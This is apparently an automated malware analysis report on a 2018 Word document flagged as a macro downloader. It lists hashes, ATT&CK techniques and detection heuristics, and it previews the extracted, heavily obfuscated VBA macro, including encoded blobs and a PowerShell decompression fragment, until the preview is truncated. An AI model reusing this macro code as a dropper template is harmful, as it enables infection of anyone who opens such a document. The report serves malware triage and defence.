Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 80f8b8f8d378b7af…

MALICIOUS

Office (OLE)

144.0 KB Created: 2018-04-03 07:07:00 Authoring application: Microsoft Office Word First seen: 2018-04-12
MD5: 484cbfbc9a478ad5d9946336ac706406 SHA-1: f7b42e324967768eceee668d6eda3b4f245ba417 SHA-256: 80f8b8f8d378b7af3755f3edd7ea320a9ae7670230e0cf231221c90ecc03972b
224 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1140 Deobfuscate or Obfuscate Malicious Code

The sample is a malicious Office document containing a VBA macro. The macro is flagged as auto-executing and uses CreateObject, indicating it's designed to perform actions beyond typical document content. The presence of a 'macros.bas' file and the ClamAV detection strongly suggest it's a downloader for a second-stage payload. The obfuscated nature of the VBA code, as indicated by the 'Deobfuscate or Obfuscate Malicious Code' heuristic, further supports this.

Heuristics 8

  • ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 37544 bytes
SHA-256: c2e9966c5e9bf2a7e5de8ea62e438c237bd410d4af4cf7d5a8fc410e9534bf48
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 12 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FzjGTHjW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "rkcwwcVWnZk"
Function KhDXzaVnr()
On Error Resume Next
zfjpS = 98341 * 96813
fJWpd = (27808 + CDate(30010 / Atn(dKwCD)) / 24537 * VJkzR * 93100 * CInt(jDVVt) * pAliT / CSng(qPCZJr))
wlbduL = Tan(70611)
iBbZM = RPikhi("pnaIx9Jne9m1ssQyLLhnaZi9WQR8SRZeSpcSA7YaW0R9fzjlnKcMGiCX3Y3bmzJkzGv0wOj/PN09vv9tDYZ8Pm9HZj+HL9Y9nby7KTyH7OPtpMvlp+tfb3+935dnZm/Pzjw9/f3vahc1FUd5urqsPj5vr78U6u7n4+unh,GE@WHVk", 2, 164)
LjiBj = 23966 * 49525
TUHUEV = (56899 + CDate(48808 / Atn(iSWGS)) / 69065 * GWzUFa * 53109 * CInt(JBdTD) * nXQmjF / CSng(WrbIB))
LsOCs = Tan(92832)
FrRUZq = 79355 * 26963
tAUnQ = (51759 + CDate(11121 / Atn(XzXSv)) / 27098 * ZukcMG * 30019 * CInt(NMcSAM) * pwiujb / CSng(dmfjJ))
VMcJdj = Tan(91712)
KdmAVJb = RPikhi("Z,E4J.wfVC+Zb7V0SiBOqvo", 7, 15)
FMBSdE = 13881 * 51078
IFDmIZ = (76130 + CDate(2922 / Atn(JOQzwj)) / 93682 * aBjToT * 31969 * CInt(jldcG) * DCzXa / CSng(wNmpI))
WjOIPV = Tan(41058)
OPcMM = 27076 * 82636
jrbzb = (12403 + CDate(30906 / Atn(WARbr)) / 66652 * QNpHzp * 35993 * CInt(Jstcjj) * bozjk / CSng(qRSHl))
APEsjj = Tan(75909)
nnNsdhfj = RPikhi("Sj2Wa/uCcePfc8vH/v53H/dTuRFl", 3, 20)
zWGrc = 25864 * 84677
Eiijo = (7241 + CDate(47945 / Atn(dLzRaw)) / 45997 * NqSkE * 98552 * CInt(wsVTE) * FEXSYM / CSng(dBKwqc))
ViVlD = Tan(97969)
osdbcB = 78978 * 16703
uscFA = (1720 + CDate(93327 / Atn(tJNBzY)) / 71376 * arHsIQ * 91836 * CInt(JiqqjG) * QRprd / CSng(OTiXS))
mawqT = Tan(84443)
wbnwrEE = RPikhi("vMcXqt9fpYu24mXyQa16UlO3Az/D/fbCbU2cDzwrvcf6MxfvTqmHqNcq5U/SU+Qf5NtRdSLxV9JzW607Yl7SVYhro3Oz07k161N54kONU/8hHWTUYUkPhzjzdu", 2, 116)
BJhQPd = 93329 * 4726
SJGMns = (95241 + CDate(69726 / Atn(hHhLY)) / 49280 * ptJzN * 85173 * CInt(wrFHi) * ZNjzT / CSng(YRGkt))
MhlkLp = Tan(72638)
qjlHvO = 84759 * 96149
HHYLV = (9670 + CDate(5256 / Atn(GVKKC)) / 44100 * DMmRw * 68183 * CInt(bwRZcs) * TrBsTP / CSng(IDdol))
JRUXoK = Tan(39749)
HjrKwzSiHmS = RPikhi("s7WLaQLvPee/QzynHUaOm3g44L49f2Bv/2gYziOOi8I95l+P1D+v+qXyhNvHlVHjqxv7I4in", 6, 64)
jcaBX = 29476 * 62491
uvcKdn = (57661 + CDate(16335 / Atn(iHsuI)) / 17052 * KjjJdt * 72043 * CInt(XkjPb) * vzriJi / CSng(bVVnL))
FCcJb = Tan(37307)
afnfZ = 79869 * 5959
ulwzn = (16655 + CDate(25235 / Atn(TiiDw)) / 87826 * BUHvtH * 95470 * CInt(VFaEn) * wXnpP / CSng(oVDrF))
YYnRQ = Tan(14149)
XqLHz = RPikhi("Y.jjMfC+msRn2PqV5Bn7xIxyxYD1hfKvW74HP6fcz+0d8r3/i7wVZ6ZKs+W7zJ+k1/N/JnJn0WT/rI+J35EvU7QSN93Eh3RPmvFa7W1LXEGeoM62Ur/9Xq22yIM3VIMf4isrQQ", 3, 126)
zmLSuJ = 17945 * 93471
brNEZ = (28521 + CDate(43182 / Atn(qNjjs)) / 60938 * QpbiZ * 46708 * CInt(pSXqU) * EtfGQO / CSng(MdArJB))
aCazEG = Tan(90756)
XQOtDV = 52966 * 17291
PwRso = (22151 + CDate(85038 / Atn(nZzctE)) / 50935 * hJKiVd * 39503 * CInt(FLJGzL) * Wtstww / CSng(VmowM))
lRiMoz = Tan(42422)
oIaqPjkL = RPikhi("iB6er/pfixwCebqRjg/qLQn1mpB4a8ucVHjveM57ybCKcLdgHKQizZ", 4, 47)
Qalli = 64089 * 74483
BlBbjc = (67738 + CDate(885 / Atn(dvXoY)) / 88225 * Rlznj * 95312 * CInt(zpjFT) * ISQXs / CSng(CukCIi))
BKEwYr = Tan(62677)
iiFmRv = 14407 * 38079
jLwMCO = (83730 + CDate(58221 / Atn(XXfDM)) / 55614 * mmOdWc * 89598 * CInt(uDjlHc) * ErBKz / CSng(lLXEzz))
kHfScz = Tan(58949)
CLbMihLm = RPikhi("wlwS6q053bAreOspr3Mj7X0lFEP5bXyaU376d8p/KU6GVrWiZR3rM9r1pUhb72Ou53tCa/iS/AY9QP93glXqt8rG84HT1ArP", 7, 88)
tqWDQ = 28584 * 34166
iFXZLS = (78583 + CDate(3714 / Atn(fIBbq)) / 48040 * fJznY * 26520 * CInt(JzDLA) * HhRTMo / CSng(aXZSSd))
zodiC = Tan(33475)
MSTqpa = 26737 * 45499
AHsjU = (6941 + CDate(27355 / Atn(JzTVoi)) / 25922 * RMaGE * 86681 * CInt(UQDES) * owVUj / CSng(qMIoUc))
RkDOY = Tan(77788)
qCHdJ = RPikhi("B%t3dmyN3q734xG55P57OJiMh2/eTPy//7vXw==' ), [SysTEm.Io.compresSioN.coMpresSIonmodE]::DEcoMPRess )| &('%'){ .('NEw-o'+'BJEC'+'t') ('Io.S'+'tReAMR'+'e'+'AD'+'ER')( $_ , [SyStem.TEXt.EncodiNG]::ASCEI", 7, 188)
RXNnR
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.